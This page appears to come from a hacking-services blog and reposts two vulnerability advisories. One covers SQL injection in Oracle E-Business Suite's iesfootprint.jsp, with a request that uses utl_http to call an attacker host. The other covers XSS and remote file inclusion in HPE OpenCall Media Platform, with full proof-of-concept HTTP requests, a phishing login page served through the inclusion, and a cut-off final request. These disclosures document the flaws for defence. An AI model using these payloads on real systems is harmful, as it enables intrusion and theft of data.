Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863164562

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Application: Oracle E-Business Suite
Versions Affected: Oracle EBS 12.2.3
Vendor URL: http://oracle.com
Bug: SQL injection
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Dmitry Chastuhin (ERPScan)

Description

1. ADVISORY INFORMATION

Title:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT
Advisory ID: [ERPSCAN-17-021]
Risk: high
CVE: CVE-2017-3549
Advisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/
Date published: 18.04.2017
Vendors contacted: Oracle


2. VULNERABILITY INFORMATION

Class: SQL injection
Impact: read sensitive data, modify data from database
Remotely Exploitable: yes
Locally Exploitable: no

CVSS Information

CVSS Base Score v3:    8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)

3. VULNERABILITY DESCRIPTION

The code comprises an SQL statement containing strings that can be
altered by an attacker. The manipulated SQL statement can be used then
to retrieve additional data from the database or to modify the data
without authorization.

4. VULNERABLE PACKAGES

Oracle EBS 12.2.3

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU April 2017

6. AUTHOR

Dmitry Chastuhin


7. TECHNICAL DESCRIPTION

PoC

vulnerable jsp name is  iesfootprint.jsp

 deployDate = ((request.getParameter("deployDate")) != null) ?
request.getParameter("deployDate") : "";
  responseDate = ((request.getParameter("responseDate")) != null) ?
request.getParameter("responseDate") : "";
  dscriptName = ((request.getParameter("dscript_name")) != null) ?
request.getParameter("dscript_name") : "";
  dscriptId = ((request.getParameter("dscriptId")) != null) ?
request.getParameter("dscriptId") : "";
%>

<%
// Process the data based on params
if (showGraph) {
   // Create Query String
   StringBuffer query = new StringBuffer("SELECT panel_name,
count_panels, avg_time, min_time, max_time, ");
   query.append("\'").append(_prompts[10]).append("\'");
   query.append(" Average_Time FROM (SELECT rownum, panel_name,
count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name,
count(panel_name) count_panels,
(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000
min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE
dscript_id = ");
   query.append(dscriptId);
   query.append(" AND start_time between ");
   query.append("\'").append(deployDate).append("\'");
   query.append(" and ");
   query.append("\'").append(responseDate).append("\'");
   query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE
rownum < 11");



   // Get XMLDocument for the corresponding query and Paint graph
   try {

       XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());
       htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);

Approximate request with SQL injection


http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'
AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY
panel_name)) --





8. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

9. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.




Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security
HireHackking 
Source: https://blogs.securiteam.com/index.php/archives/3087

SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities

Want to get paid for a vulnerability similar to this one?
Contact us at: ssd@beyondsecurity.com

Vulnerabilities Summary
The following advisory describes Reflected Cross-Site Scripting (XSS)
vulnerabilities and a Remote File Inclusion vulnerability that when
combined can lead to Code Execution, were found in HP OpenCall Media
Platform (OCMP), version 4.3.2.

HPE OpenCall Media Platform (OCMP) is a suite of software and hardware
applications which allow implementation of common telecom operator
services such as voicemail, sms (short message service), prepaid,
billing, hlr, etc. It implements industry standard telecom protocols
and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML.

HPE OpenCall Media Platform offers a highly scalable, easy-to-manage,
carrier-grade media platform that adapts to future networks and
applications. Through its strong support of open standards and
protocols, new applications can be rapidly developed and deployed in a
way that preserves investments and reduces capital expenditures
(CAPEX) and operational expenditure (OPEX).

There are 3 different components that are vulnerable in HPE OpenCall
Media Platform (OCMP), and for each component has the following
vulnerabilities:

Application Content Manager

Reflected Cross-Site Scripting (XSS) – /mcm/resources/


Platform Administration Tool

Reflected Cross-Site Scripting (XSS) that lead to Remote Code Execution
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter
Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter
Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter


VoiceXML Administration Tool

Reflected Cross-Site Scripting (XSS) – event.do function
Reflected Cross-Site Scripting (XSS) – call.do function
Remote File Inclusion – proxylink.do function


Credit
An independent security researcher Paolo Stagno from VoidSec has
reported this vulnerability to Beyond Security’s SecuriTeam Secure
Disclosure program.

Vendor Responses
HPE has released patches to address this vulnerability, for more details see:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03686en_us

Vulnerabilities Details

Application Content Manager – /mcm/resources/
HPE OpenCall Media Platform (OCMP) does not sanitize /mcm/resources/
“description” and “prototype” parameters input. An attacker can inject
malicious Java script to trigger the Reflected Cross-Site Scripting
(XSS).

Proof of Concept

An Attacker send the following POST request to the victims machine :


POST https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?followindirection=false
HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/mcm+json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html
Content-Length: 54
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{ "": "", "description": "<script>alert(1);</script>"}

The server will respond with:

HTTP/1.1 204 No Content
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server

Then the attacker will send the second request to trigger the
Cross-Site Scripting (XSS):

GET https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?format=json&followindirection=false&ms=1443024815924
HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html
Connection: keep-alive

The server will respond with:

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-control: no-cache
Content-Type: application/json
Transfer-Encoding: chunked
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server


VoiceXML Administration Tool – call.do function
HPE OpenCall Media Platform (OCMP) does not sanitize call.do function
parameters input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /om/call.do?action=list_calls&type=Active637a3<script>alert(1)<%2fscript>c7e9f
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://127.0.0.1:5443/om/servicegroup.do?action=addservicegroup
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B

The server will respond with:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache,no-store
Expires: Thu, 01 Jan 1970 01:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 10 Sep 2015 13:30:41 GMT
Content-Length: 10418


<HTML>
<HEAD>
<TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE>
<LINK REL="stylesheet"
HREF="consolepages/templates/stylesheets/style.css" TYPE="text/css">
</HEAD>

<BODY>
<script type="text/javascript">

//HV Menu v5- by Ger Versluis (www.burmees.nl)
//Submitted to Dynamic Drive (www.dynamicdrive.com)
//Visit www.dynamicdrive.com for this script and more

function Go(){return}

</script>
<script type="text/javascript"
src="consolepages/templates/js/exmplmenu_var.jsp"></script>
<script type="text/javascript"
src="consolepages/templates/js/menu_com.js"></script>
<noscript>Your browser does not support script</noscript>

<TABLE WIDTH="800" BORDER="0">
<TR>
<TD><IMG SRC="consolepages/templates/images/speechweb.gif"/></TD>
</TR>
<TR>

<TD VALIGN="top">
Logged on as: zerpsta1 <SPAN id="warn"> &nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp;      </SPAN>
<BR><BR><BR><BR>


<br>
<b>Call Management -> Active637a3<script>alert(1)</script>c7e9f Calls</b>

<br><br><br>

<table border="1" width="1000">
<tr><td colspan="12" class="tableheader">Calls <a href="#"><img
src="consolepages/templates/images/questionmark.gif" border="0"
onClick="window.open('help.do?prompt=p20', 'help',
'toolbar=no,width=400,height=400,resizable=no,scrollbars=yes');"></a></td></tr>
<tr><td colspan="12">&nbsp;</td></tr>
<tr>
<td><b><a href=call.do?action=sort_calls&type=node>Server Id</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=callid>CallId</a></b></td>
<td><b>CDR</b></td>
<td><b>Call Monitoring</b></td>
<td><b>Service Id</b></td>
<td><b><a href=call.do?action=sort_calls&type=ruri>Remote-URI</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=luri>Local-URI</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=severe>Severes</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=warning>Warnings</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=vxml_exception>VoiceXML
Exceptions</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=time>Started At</a></b></td>

<td><b>Duration</b></td>


</tr>



    <tr bgcolor="eeeeee">

    <td>tb0ocmp1</td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_3</a></td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
    <td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_3&node=tb0ocmp1">Monitor</a></td>

    <td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>

    <td>sip:unavailable@unknown.invalid</td>
    <td>+1542000470521123</td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=ERROR
target="new">1</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=WARN
target="new">0</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=vxml_exception
target="new">21</a></td>
    <td>150909 19:00:52.429</td><td>00:00:00.502</td>

    </tr>


    <tr>

    <td>tb0ocmp0</td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_2</a></td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
    <td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_2&node=tb0ocmp0">Monitor</a></td>

    <td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>

    <td>sip:unavailable@unknown.invalid</td>
    <td>+1542000470174023</td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=ERROR
target="new">1</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=WARN
target="new">0</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=vxml_exception
target="new">21</a></td>
    <td>150908 19:29:05.236</td><td>00:00:00.501</td>

    </tr>


    <tr bgcolor="eeeeee">

    <td>tb0ocmp1</td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_2</a></td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
    <td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_2&node=tb0ocmp1">Monitor</a></td>

    <td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>

    <td>sip:unavailable@unknown.invalid</td>
    <td>+1542000470852423</td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=ERROR
target="new">1</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=WARN
target="new">0</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=vxml_exception
target="new">21</a></td>
    <td>150908 19:27:56.237</td><td>00:00:01.003</td>

    </tr>

    <tr>

    <td>tb0ocmp0</td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_1</a></td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
    <td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_1&node=tb0ocmp0">Monitor</a></td>

    <td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>

    <td>sip:unavailable@unknown.invalid</td>
    <td>+1542000470632723</td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=ERROR
target="new">1</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=WARN
target="new">0</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=vxml_exception
target="new">21</a></td>
    <td>150907 18:57:21.548</td><td>00:00:01.004</td>

    </tr>

    <tr bgcolor="eeeeee">

    <td>tb0ocmp1</td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_1</a></td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
    <td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_1&node=tb0ocmp1">Monitor</a></td>

    <td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>

    <td>sip:unavailable@unknown.invalid</td>
    <td>+1542000470277023</td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=ERROR
target="new">1</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=WARN
target="new">0</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=vxml_exception
target="new">21</a></td>
    <td>150907 15:13:19.660</td><td>00:00:01.003</td>

    </tr>

    <tr>
    <td>tb0ocmp0</td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_0</a></td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
    <td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_0&node=tb0ocmp0">Monitor</a></td>

    <td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>

    <td>sip:unavailable@unknown.invalid</td>
    <td>+1542000470860823</td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=ERROR
target="new">1</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=WARN
target="new">0</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=vxml_exception
target="new">21</a></td>
    <td>150907 15:12:15.254</td><td>00:00:00.501</td>


    </tr>



    <tr bgcolor="eeeeee">

    <td>tb0ocmp0</td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_0</a></td>

    <td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
    <td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_0&node=tb0ocmp0">Monitor</a></td>

    <td><a href="service.do?action=update&id=o2_ivr_3xxx">o2_ivr_3xxx</a></td>

    <td>sip:unavailable@unknown.invalid</td>
    <td>+1540003000009388</td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=ERROR
target="new">0</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=WARN
target="new">0</a></td>
    <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=vxml_exception
target="new">0</a></td>
    <td>150907 15:00:13.901</td><td>00:00:45.194</td>


    </tr>





</table>

</TD>
</TR>
</TABLE>
</BODY>
</HTML>

VoiceXML Administration Tool – event.do function
HPE OpenCall Media Platform (OCMP) does not sanitize event.do function
parameters input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL: /om/event.do?action=list&type=XSS_HERE

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /om/event.do?action=list&type=Active637a3<script>alert(1)<%2fscript>c7e9f
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://172.27.116.32:5443/om/call.do?action=trace_calls&type=trace_calls
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 172.27.116.32:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B

The server will respond with:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2437
Date: Thu, 10 Sep 2015 13:32:55 GMT





<HTML>
<HEAD>
<TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE>
<LINK REL="stylesheet"
HREF="consolepages/templates/stylesheets/style.css" TYPE="text/css">
</HEAD>

<BODY>
<script type="text/javascript">

//HV Menu v5- by Ger Versluis (www.burmees.nl)
//Submitted to Dynamic Drive (www.dynamicdrive.com)
//Visit www.dynamicdrive.com for this script and more

function Go(){return}

</script>
<script type="text/javascript"
src="consolepages/templates/js/exmplmenu_var.jsp"></script>
<script type="text/javascript"
src="consolepages/templates/js/menu_com.js"></script>
<noscript>Your browser does not support script</noscript>

<TABLE WIDTH="800" BORDER="0">
<TR>
<TD><IMG SRC="consolepages/templates/images/speechweb.gif"/></TD>
</TR>
<TR>

<TD VALIGN="top">
Logged on as: zerpsta1 <SPAN id="warn"> &nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp;      </SPAN>
<BR><BR><BR><BR>






<script language="JavaScript">
  function toggleVisibility( divId, buttonId ) {
    if( document.all[divId].style.display == 'none' ) {
      document.all[divId].style.display = 'inline';
      document.all[buttonId].value = 'Hide Stacktrace';
    } else {
      document.all[divId].style.display = 'none';
      document.all[buttonId].value = 'Show Stacktrace';
    }
  }
</script>

<br>
<b>Active637a3<script>alert(1)</script>c7e9f</b>
<br><br>


<form action="event.do">
<input type="submit" value="Reset" name="submit" onClick="return
confirm('Are you sure you want to remove all
Active637a3<script>alert(1)</script>c7e9f?')">
<input type="hidden" name="action" value=reset >
<input type="hidden" name="type"
value="Active637a3<script>alert(1)</script>c7e9f">
</form>
<br><br>


<table border="1" width="1200">
<tr><td colspan="8" class="tableheader">Events <a href="#"><img
src="consolepages/templates/images/questionmark.gif" border="0"
onClick="window.open('help.do?prompt=p21', 'help',
'toolbar=no,width=400,height=400,resizable=no,scrollbars=yes');"></a></td></tr>
<tr><td colspan="8">&nbsp;</td></tr>
<tr>
<td><b><a href=event.do?action=sort&type=NODE >Server Id</a></b></td>
<td><b><a href=event.do?action=sort&type=TIME >Date</a></b></td>
<td><b><a href=event.do?action=sort&type=CALL >CallId</a></b></td>
<td><b>CDR</b></td>
<td><b>Service Id</b></td>
<td><b>Message</b></td>
</tr>

<tr><td colspan="8">&nbsp;</td></tr>
  <tr><td colspan="8">No Items Found</td></tr>

</TD>
</TR>
</TABLE>
</BODY>
</HTML>

VoiceXML Administration Tool – proxylink.do function
HPE OpenCall Media Platform (OCMP) does not sanitize proxylink.do
function parameters input. An attacker can inject malicious URL to
including remote files. After the attacker include the file, the HPE
OpenCall Media Platform will parse and execute the content of the
file.

The vulnerable URL: /om/proxylink.do?url=Remote File Inclusion Here (RFI)

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /om/proxylink.do?url=http://172.27.120.220:9595/fruuuuk.txt HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 172.27.116.32:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5D8C311BBE2784FB2CE6DB970878D3CA

The server will respond with:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2565
Date: Wed, 09 Sep 2015 13:00:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>PHISHING LOGIN PAGE</title>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<link rel="Shortcut Icon" href="/login/images/hp.ico">
<script>
function onLoginFornLoad() {
    document.getElementById("txtUsername").focus();
}
</script>
    <style type="text/css">
        .style1
        {
            width: 290px;
        }
        .style2
        {
            width: 285px;
        }
    </style>
</head>

<body onload="onLoginFornLoad()">
<h2>PHISHING LOGIN PAGE</h2>
<script>document.write("I`m also running JS");</script>
<form action="j_security_check" method="POST">
<table cellpadding="0" cellspacing="0" width="100%" height="100%"
style="background-color: #ffffff">
<tr>
    <td align="center" valign="middle">
        <table cellpadding="0" cellspacing="0" height="309"
                style="border: 1px solid #000000; background-position:
left top; background-image:url('/login/images/hp_logo.png');
background-repeat: no-repeat; width: 576px; clip: rect(1px, auto,
auto, auto);" >
        <tr>
            <td class="style2">&nbsp;</td>
            <td class="style1">
<table cellpadding="0" cellspacing="0">
                <tr>
                    <td width="60"
                            style="font-family: Arial, Helvetica,
sans-serif; color: #000000; font-weight: bold">
                            User&nbsp;Name&nbsp;&nbsp;</td>
                    <td><input name="j_username" type="text" size="14"
style="width: 193px;"
                                id="txtUsername" value=""></td>
                </tr>
                <tr><td colspan="2" height="3"></td></tr>
                <tr>
                    <td style="font-family: Arial, Helvetica,
sans-serif; font-weight: bold">Password&nbsp;</td>
                    <td><input name="j_password" type="password"
size="14" style="width: 191px"></td>
                </tr>
                <tr><td colspan="2" height="3"></td></tr>
<tr><td colspan="2">&nbsp;</td></tr>
                    <td colspan="2" align="right">
                        <button type="submit"  value="Log in"
style="width:54px; margin-top:8px">Login</button>
                    </td>
                </tr>
                </table>
            </td>
            <td style="background-color: #FFFFFF">&nbsp;</td>
        </tr>
        </table>
    </td>
</tr>
</table>
</form>
</body>
</html>

Platform Administration Tool – Reflected Cross-Site Scripting (XSS)
that lead to Remote Code Execution
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function with parameter cmd=DisplayBaseCdrBrowsePage. An attacker can
inject malicious Java script to trigger the Cross-Site Scripting
(XSS).

Proof of Concept
An Attacker send the following GET request to the victims machine:

GET /OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePagef5df3<script>alert(1)<%2fscript>1d8b4&sessionType=NONE
HTTP/1.1
Host: 172.27.116.40:4443
